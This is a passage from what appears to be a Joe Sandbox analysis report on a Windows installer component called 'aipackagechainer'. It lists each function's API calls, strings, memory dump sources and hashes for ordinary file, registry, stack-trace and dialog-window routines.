CopyFileW.KERNEL32(?,002C1520,00000000,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 00260961
GetLastError.KERNEL32(?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 0026096B

Part of subcall function 00232D30: LocalFree.KERNEL32(00000000,80004005), ref: 00232D49
Part of subcall function 00232D30: LocalFree.KERNEL32(?,80004005), ref: 00232D59
Part of subcall function 00232D30: GetLastError.KERNEL32(?,80004005), ref: 00232D97

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,002AA4CD,000000FF,?,0025B28B,?,?), ref: 00260996

Strings

S-1-1-0, xrefs: 00260809
.part, xrefs: 00260784
S-1-5-18, xrefs: 00260819

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$Time$ErrorLast$System$CopyCreateDeleteFreeLocal$CloseCompareExistsHandleMovePath
String ID: .part$S-1-1-0$S-1-5-18
API String ID: 1827882016-2727065896
Opcode ID: ea64c990f35cb9fbcc31c1735ad0d67e464711fbb414aec087fc1c2c5ea6fc3b
Instruction ID: e0aeba428ed6f2a2f5ee59d5425a3f963ff16f53c4ae077b295027c769984d6b
Opcode Fuzzy Hash: ea64c990f35cb9fbcc31c1735ad0d67e464711fbb414aec087fc1c2c5ea6fc3b
Instruction Fuzzy Hash: 70E1B930A10705EFEB20CFA8C988BABBBF5BF45704F14451DE042A76E1DBB0A894DB50

Function 0022EAC0 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 368memorystringCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(?,4938EAB5,00000000,00000000), ref: 0022EB49
CharNextW.USER32(?,00000000), ref: 0022EBC9
CharNextW.USER32(00000000,?,00000000), ref: 0022EBCE
CharNextW.USER32(00000000,?,00000000), ref: 0022EBD3
CharNextW.USER32(00000000,?,00000000), ref: 0022EBD8
CharNextW.USER32(?,?,00000000,00000001,4938EAB5,00000000,00000000), ref: 0022EC23
CharNextW.USER32(?,?,00000000,00000001,4938EAB5,00000000,00000000), ref: 0022EC33
CharNextW.USER32(00000000,}},00000009,?,00000000,00000001,4938EAB5,00000000,00000000), ref: 0022ECAF
CharNextW.USER32(00000000,?,00000000,00000001,4938EAB5,00000000,00000000), ref: 0022ECDD
EnterCriticalSection.KERNEL32(-00000005,00000001,4938EAB5,00000000,00000000), ref: 0022ED2D
lstrcmpiW.KERNEL32(?,?), ref: 0022ED51
LeaveCriticalSection.KERNEL32(?), ref: 0022ED67
LeaveCriticalSection.KERNEL32(?,?,?), ref: 0022EDA0
CharNextW.USER32(00000000,?,?), ref: 0022EDF2
CharNextW.USER32(?,00000000,00000001,4938EAB5,00000000,00000000), ref: 0022EE11
CoTaskMemFree.OLE32(00000000,4938EAB5,00000000,00000000), ref: 0022EE5B

Strings

HKCR, xrefs: 0022EBB0
HKCU{Software{Classes, xrefs: 0022EBEC
}}, xrefs: 0022EC88

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CharNext$CriticalSection$LeaveTask$AllocEnterFreelstrcmpi
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 3576304915-1142484189
Opcode ID: 20b0648234cb10aef6fcd832396d4e5f4619163d8a0d23c3a9a2adc921a19553
Instruction ID: 88326094a13618180ee9c309e820b8d843a188bd6df6fafec086198c2c4778f5
Opcode Fuzzy Hash: 20b0648234cb10aef6fcd832396d4e5f4619163d8a0d23c3a9a2adc921a19553
Instruction Fuzzy Hash: CDD1F270920369AFDF20DFE8E844BAEBBF8EF05710F164159E805EB295EB749810DB51

Function 00239610 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 292libraryloaderthreadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(002D8B5C,4938EAB5), ref: 00239683
EnterCriticalSection.KERNEL32(002D8B5C,4938EAB5), ref: 00239698
GetCurrentProcess.KERNEL32 ref: 002396A5
GetCurrentThread.KERNEL32 ref: 002396B3
SymSetOptions.DBGHELP(80000016), ref: 002396DF
LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 0023974D
GetProcAddress.KERNEL32(00000000), ref: 00239754
SymInitialize.DBGHELP(00000000,00000000,00000001,002BC440,00000000), ref: 0023979C
StackWalk.DBGHELP(0000014C,?,?,?,?,00000000,00000000,*** Stack Trace (x86) ***,?,?,?), ref: 002398DF
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,?,?,?), ref: 00239990
SymCleanup.DBGHELP(?,?), ref: 00239A72
LeaveCriticalSection.KERNEL32(002D8B5C,?), ref: 00239A9D

Strings

MODULE_BASE_ADDRESS, xrefs: 002399C2
[0x%.8Ix] , xrefs: 00239997
SymFromAddr, xrefs: 00239743
<--------------------MORE--FRAMES-------------------->, xrefs: 0023992D
*** Stack Trace (x86) ***, xrefs: 00239872
Dbghelp.dll, xrefs: 00239748

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 4282195395-80696534
Opcode ID: f55774917b27ff4fda3cc59a70a4a62206b10721ba9878dc2506373743a6161a
Instruction ID: 5462722c1dbf13347ba4d365593f0dff774c38bb68b65bd053f2c00ab3a06751
Opcode Fuzzy Hash: f55774917b27ff4fda3cc59a70a4a62206b10721ba9878dc2506373743a6161a
Instruction Fuzzy Hash: 17C1AAB0C206689BDF20DF24CC49BEEBBB5AB56305F1042DAE409A7291DBB45BD4CF51

Function 00258520 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00258559
SendMessageW.USER32(00000000,00000406,00000000,?), ref: 0025856D

Part of subcall function 0025EA60: GetWindowLongW.USER32(?,000000F0), ref: 0025EA85
Part of subcall function 0025EA60: GetParent.USER32(?), ref: 0025EA8F

GetDlgItem.USER32(?,0000040A), ref: 0025859C
SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 002585D7
GetWindowLongW.USER32(?,000000F0), ref: 002585EC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00258604
CreateWindowExW.USER32(00000000,tooltips_class32,00000000,00000000,80000000,80000000,00000000,00000000,?,00000000,00000000), ref: 00258641
IsWindow.USER32(00000000), ref: 0025864B
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 00258661

Part of subcall function 0027A15A: GetProcessHeap.KERNEL32(00000008,00000008,?,0024711E), ref: 0027A15F
Part of subcall function 0027A15A: HeapAlloc.KERNEL32(00000000), ref: 0027A166

SetWindowTextW.USER32(?,?), ref: 00258712
GetDlgItem.USER32(?,00000002), ref: 0025875A
EnableWindow.USER32(00000000,00000000), ref: 00258763
GetSystemMenu.USER32(?,00000000), ref: 0025876E
ModifyMenuW.USER32(00000000,0000F060,00000001,00000000,00000000), ref: 0025878C
DestroyMenu.USER32(00000000), ref: 0025879E
SetEvent.KERNEL32(?,000000DA), ref: 002587B9

Strings

tooltips_class32, xrefs: 0025863A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$ItemMenu$HeapMessageSend$AllocCreateDestroyEnableEventModifyParentProcessSystemText
String ID: tooltips_class32
API String ID: 3996269815-1918224756
Opcode ID: 52ce2622791a7ec7f893be2295be3acd96da2106c0627dd4eb1b5a766e157583
Instruction ID: ab9fbbb9a84be053e0bc12b332117c05723fcfe2385bd7f47d825103aa7a12ea
Opcode Fuzzy Hash: 52ce2622791a7ec7f893be2295be3acd96da2106c0627dd4eb1b5a766e157583
Instruction Fuzzy Hash: B081C071610202EFDF109F64DC49B6ABBB5FF05711F148269F915AB2E1DB70A811CFA4

Function 0023E980 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 223COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000001F6), ref: 0023E9CE
GetDlgItem.USER32(?,000001F8), ref: 0023E9DB
GetDlgItem.USER32(?,000001F7), ref: 0023EA1D
SetWindowTextW.USER32(00000000,?), ref: 0023EA2C
ShowWindow.USER32(?,00000005), ref: 0023EA92
GetDlgItem.USER32(?,000001F7), ref: 0023EAB4
SetWindowTextW.USER32(00000000,?), ref: 0023EAC3
ShowWindow.USER32(?,00000000), ref: 0023EB28
ShowWindow.USER32(?,00000000), ref: 0023EB2F
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 0023EB78
GetDlgItem.USER32(?,00000000), ref: 0023EBAA
IsWindow.USER32(00000000), ref: 0023EBB4
IsRectEmpty.USER32(?), ref: 0023EBD1
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,00000000,?,?,00000616), ref: 0023EC01

Strings

Details <<, xrefs: 0023EA04
Details >>, xrefs: 0023EA9B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Item$Show$Text$EmptyRect
String ID: Details <<$Details >>
API String ID: 4171068809-3763984547
Opcode ID: 0a8801ee4ac17f96fa0f866cbf09b7c965661d917e8f1bba76da65f5255d96c8
Instruction ID: 591274e23463f2ef6542f8df0ab544ab013de128136059062eb574425eec109d
Opcode Fuzzy Hash: 0a8801ee4ac17f96fa0f866cbf09b7c965661d917e8f1bba76da65f5255d96c8
Instruction Fuzzy Hash: 2C81BFB1D20209ABDF04DF68DC4ABAEBBB5FF19310F158219F401A7691DB30A965CF90

Function 0025FA90 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 277windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0025FABD
GetWindowLongW.USER32(?,000000F0), ref: 0025FAD2
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025FAE9

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

GetWindowLongW.USER32(?,000000EC), ref: 0025FB02
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0025FB16
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0025FB24
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0025FB37
IsWindow.USER32(00000000), ref: 0025FB52
DestroyWindow.USER32(00000000), ref: 0025FB6E
GetClientRect.USER32(?,?), ref: 0025FBC6
IsWindow.USER32(00000000), ref: 0025FBEA
CreateWindowExW.USER32(00000000,SCROLLBAR,00000000,5402001C,?,?,?,?,?,0000E801,00000000), ref: 0025FC42
IsWindow.USER32(00000000), ref: 0025FC4B
GetClientRect.USER32(?,?), ref: 0025FCD9

Strings

SCROLLBAR, xrefs: 0025FC3B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$ClientMessageRectSend$AllocateCreateDestroyHeap
String ID: SCROLLBAR
API String ID: 2923869516-324577739
Opcode ID: 6092aec750e6f7133465cb820417d583cbb2f0780d739d0f36efa2c2bad430dc
Instruction ID: 33856c1723d110a64cad36d129d7ad950353611179ddee9103c7b6c1dff13535
Opcode Fuzzy Hash: 6092aec750e6f7133465cb820417d583cbb2f0780d739d0f36efa2c2bad430dc
Instruction Fuzzy Hash: 21B17770519301AFEB50CF28D949B2ABBF4FF89311F104A2DF995972A0DB71E854CB92

Function 002601C0 Relevance: 25.8, APIs: 17, Instructions: 340COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00260205
GetWindowRect.USER32(00000000,?), ref: 00260213
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00260243
InvalidateRect.USER32(00000000,00000000,00000001), ref: 00260541
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 0026056A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$InvalidateItemPoints
String ID:
API String ID: 2775623374-0
Opcode ID: 73214ad41ef904514b5d86ce600b1d0f98ef51f16290e29eb3c89471a830d0d2
Instruction ID: 567c4b67e0f13b9da9b50a97bb2dcd125e322e69125fbd3828471698c16f23fc
Opcode Fuzzy Hash: 73214ad41ef904514b5d86ce600b1d0f98ef51f16290e29eb3c89471a830d0d2
Instruction Fuzzy Hash: 14D137716143019FCB08CF6CC999A6BBBE5BF89300F088A5CF989CB255D730E955CB52

Function 00229130 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 257libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,4938EAB5,?,?,00228883,0000001C,0000001C,workstation,00238891,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?,?,0000001C,?), ref: 00229198
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0022919E
LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,002BCFB8,?,4938EAB5,?,?,00228883,0000001C,0000001C,workstation,00238891,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?), ref: 002291D2
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 002291D8

Strings

CoIncrementMTAUsage, xrefs: 002291C8
RoGetActivationFactory, xrefs: 0022918E
combase.dll, xrefs: 00229193, 002291CD
.dll, xrefs: 002292D2
DllGetActivationFactory, xrefs: 0022932E

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 2574300362-2454113998
Opcode ID: f73235f95a7279366395166e87b9c670b334c7634b14ba811c6147d32e1e524a
Instruction ID: 29adc32d440753f742b549f8c91583424e4f6be643125797273e9c6ac103e246
Opcode Fuzzy Hash: f73235f95a7279366395166e87b9c670b334c7634b14ba811c6147d32e1e524a
Instruction Fuzzy Hash: 55A1F170D2021AEFDF14DFE8D894BEDBBB5AF59310F244169E411B7290DB709AA0CB50

Function 00225D70 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 253libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,4938EAB5,?,?,?,?,?,?,?,?,?,?,?,?,4938EAB5), ref: 00225DEA
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00225DF0
GetErrorInfo.OLEAUT32(00000000,00000000), ref: 00225E2D
LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,002BC440,00000000,00000000,00000000), ref: 00225F6B
GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00225FB4

Strings

CoIncrementMTAUsage, xrefs: 00225E6C
RoGetActivationFactory, xrefs: 00225DE0
combase.dll, xrefs: 00225DE5, 00225E71
.dll, xrefs: 00225F52
DllGetActivationFactory, xrefs: 00225FAE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressLibraryLoadProc$ErrorInfo
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 954284200-2454113998
Opcode ID: e10252133d2970ddb1f48cf62e010db32b846fff4689c9726b72cc442fc530da
Instruction ID: 47a2c788fab9dcd73cbd27203b1cfb09867b91bd82865b2900f1616755e43e9e
Opcode Fuzzy Hash: e10252133d2970ddb1f48cf62e010db32b846fff4689c9726b72cc442fc530da
Instruction Fuzzy Hash: 71A1B171D20229EFCB14DFE8E985BEDBBB5BF19300F248119E411B7290DB709A64CB51

Function 0023E670 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00237530: LoadLibraryW.KERNEL32(ComCtl32.dll,4938EAB5,?,00000008,00000008), ref: 0023756E
Part of subcall function 00237530: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00237591
Part of subcall function 00237530: FreeLibrary.KERNEL32(00000000), ref: 0023760F

GetDlgItem.USER32(?,000001F4), ref: 0023E6B1
SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 0023E6C2
GetDC.USER32(00000000), ref: 0023E6CA
GetDeviceCaps.GDI32(00000000), ref: 0023E6D1
MulDiv.KERNEL32(00000009,00000000), ref: 0023E6DA
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Courier New), ref: 0023E703
GetDlgItem.USER32(?,000001F6), ref: 0023E714
IsWindow.USER32(00000000), ref: 0023E71D
SendMessageW.USER32(00000000,00000030,?,00000000), ref: 0023E734
GetDlgItem.USER32(?,000001F8), ref: 0023E73E
GetWindowRect.USER32(?,?), ref: 0023E74F
GetWindowRect.USER32(?,?), ref: 0023E762
GetWindowRect.USER32(00000000,?), ref: 0023E772

Strings

Courier New, xrefs: 0023E6E0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemRect$LibraryMessageSend$AddressCapsCreateDeviceFontFreeLoadProc
String ID: Courier New
API String ID: 1731048342-2572734833
Opcode ID: 336e2d86fede1734c2dd7fd12522c3f4ecf6c87f4b79fb82220103e8b67d151b
Instruction ID: 97a827b124bf2c3756daf842bcaaee0beb45bdee82e80a23cc7cf1671ebc5015
Opcode Fuzzy Hash: 336e2d86fede1734c2dd7fd12522c3f4ecf6c87f4b79fb82220103e8b67d151b
Instruction Fuzzy Hash: A541C571B943087BFB149F20AC56FBE77A9AF49B04F020529FB097A1D1DAB0AC508B55

Function 0025BAB0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 278fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,4938EAB5), ref: 0025BAEF
GetLastError.KERNEL32 ref: 0025BB10

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

GetFileSize.KERNEL32(00000000,00000000), ref: 0025BB20
GetLastError.KERNEL32 ref: 0025BB2D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,002A9A55,000000FF), ref: 0025BDB6

Strings

utf-16, xrefs: 0025BBC2
ISO-8859-1, xrefs: 0025BC8B
US-ASCII, xrefs: 0025BCA8
utf-8, xrefs: 0025BBA5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorFileLast$AllocateCloseCreateHandleHeapSize
String ID: ISO-8859-1$US-ASCII$utf-16$utf-8
API String ID: 4082270022-3020978663
Opcode ID: 4d554621e5a4bfde0867e8435e0e3d9e7e3dec8ce223bdafb8601a08eb4af526
Instruction ID: 65aea4ba6c4d91d3d87236f4233d5b0a31febfd68a250aab803a9fa58540c622
Opcode Fuzzy Hash: 4d554621e5a4bfde0867e8435e0e3d9e7e3dec8ce223bdafb8601a08eb4af526
Instruction Fuzzy Hash: C5913871A21206EFDB11DF64CC45BAEB7B8AF15721F144129FC05A72C1DBB49928CB64

Function 0022DD30 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,4938EAB5), ref: 0022DDD8
GetLastError.KERNEL32 ref: 0022DDE2
EnterCriticalSection.KERNEL32(?), ref: 0022DE57
LeaveCriticalSection.KERNEL32(?,76ECE820,?), ref: 0022DE84
GetModuleFileNameW.KERNEL32(00210000,?,00000104), ref: 0022DED9
GetModuleHandleW.KERNEL32(00000000), ref: 0022DF41
LeaveCriticalSection.KERNEL32(?,Module,?), ref: 0022E040
EnterCriticalSection.KERNEL32(?), ref: 0022E061
LeaveCriticalSection.KERNEL32(?,Module_Raw,?), ref: 0022E095

Strings

Module, xrefs: 0022E027
REGISTRY, xrefs: 0022E116
Module_Raw, xrefs: 0022E07C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$Leave$EnterModule$ErrorFileHandleInitializeLastName
String ID: Module$Module_Raw$REGISTRY
API String ID: 1851870515-549000027
Opcode ID: cc52113d124ba2d9bb56793a18d5ea76fefce83dc1ba53b61667dc36bc0735f0
Instruction ID: d20b75daee662ab8425a5423393b8a5672ad88e06bbc702eb39c83ae4f9c0fc5
Opcode Fuzzy Hash: cc52113d124ba2d9bb56793a18d5ea76fefce83dc1ba53b61667dc36bc0735f0
Instruction Fuzzy Hash: E2B1DF31910328ABDB20DFA4DC48BDEB7B4AF5A310F1145D9D80DA7680EB759E94CF92

Function 00248840 Relevance: 21.2, APIs: 14, Instructions: 170COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00248887
GetParent.USER32 ref: 0024889D
GetWindowRect.USER32(?,?), ref: 002488A8
GetParent.USER32(?), ref: 002488B0
GetClientRect.USER32(00000000,?), ref: 002488BF
GetClientRect.USER32(?,?), ref: 002488C8
MapWindowPoints.USER32(00000002,00000000,?,00000002), ref: 002488D4
GetWindow.USER32(?,00000004), ref: 002488E2
GetWindowRect.USER32(?,?), ref: 002488F0
GetWindowLongW.USER32(00000000,000000F0), ref: 002488FD
MonitorFromWindow.USER32(?,00000002), ref: 00248915
GetMonitorInfoW.USER32(00000000,00000004), ref: 0024892F
SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 002489DD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$ClientLongMonitorParent$FromInfoPoints
String ID:
API String ID: 3127921553-0
Opcode ID: ba353e5f6caefd6fcf05d2f493858a27b0c7807511f28b30fbe6fba252e4579b
Instruction ID: a83719128593056ba15a64acddb4717f63f868b8d0f1124ce8c259cce6109af3
Opcode Fuzzy Hash: ba353e5f6caefd6fcf05d2f493858a27b0c7807511f28b30fbe6fba252e4579b
Instruction Fuzzy Hash: 5B518D32D10519AFDF14CFA8DD49AAEBBB9FB49710F254229E815A3290DF30AD11CB91

Function 0023DD20 Relevance: 21.2, APIs: 14, Instructions: 151windowCOMMON

Download Yara Rule

APIs

